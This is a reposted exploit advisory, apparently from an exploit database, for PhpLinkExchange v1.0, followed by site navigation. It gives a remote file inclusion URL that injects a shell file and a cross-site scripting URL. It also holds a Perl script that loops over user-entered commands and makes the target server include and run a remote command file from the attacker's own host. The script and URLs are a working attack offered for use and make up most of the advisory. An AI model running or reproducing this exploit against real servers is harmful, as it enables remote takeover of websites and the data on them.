PhpLinkExchange v1.0 RFI + RC + Xss [RC-exploit]

Advisory Content :

vendor :www.idevspot.com

Demo : www.idevspot.com/demo/PhpStart/PhpLinkExchange

By : s3rv3r_hack3r

www: hackerz.ir & h4ckerz.com

remote file include :

http://www.domain.com/PhpLinkExchange/bits_listings.php?svr_rootPhpStart
=[shell.txt?]

xss:

http://www.domain.com/PhpLinkExchange/user_add.php?msg=[xss]

remote command Exploit :

#!/usr/bin/perl

#

# Exploit by s3rv3r_hack3r

######################################################

# ___ ___ __ #

# / | _____ ____ | | __ ___________________ #

#/ ~ __ _/ ___| |/ // __ _ __ ___ / #

# Y // __ \ ___| < ___/| | // / #

# ___|_ /(____ )___ >__|_ \___ >__| /_____ #

# / / / / / / #

# Iran Hackerz Security Team #

# WebSite: www.hackerz.ir & www.h4ckerz.com

######################################################

use LWP::Simple;

print "-------------------------------------------n";

print "= Iran hacekerz security team =n";

print "= By s3rv3r_hack3r - www.hackerz.ir =n";

print "-------------------------------------------nn";

print "Target >http://";

chomp($targ = <STDIN>);

print "your web site name >";

chomp($cmd= <STDIN>);

$con=get("http://".$targ."/bits_listings.php") || die "[-]Cannot connect to
Host";

while ()

{

print "command$";

chomp($cmd=<STDIN>);

$commd=get("http://".$targ."/bits_listings.php?svr_rootPhpStart=http://w
ww.hackerz.ir/cmd.txt?cmd=".$cmd)

}

+++++

Security

IT News

Search

SecurityAlert Database

About SecurityAlert

ExploitAlert Database

SecurityReason Research

WLB Database

Send to WLB

About WLB

Security Audit

Schedule

Prices of services

Contact

SecurityReason IT News

SecurityAlert

World Laboratory of Bugtraq

ExploitAlert

Apache

PHP

Contact

About SecurityReason

PhpLinkExchange v1.0 RFI + RC + Xss [RC-exploit]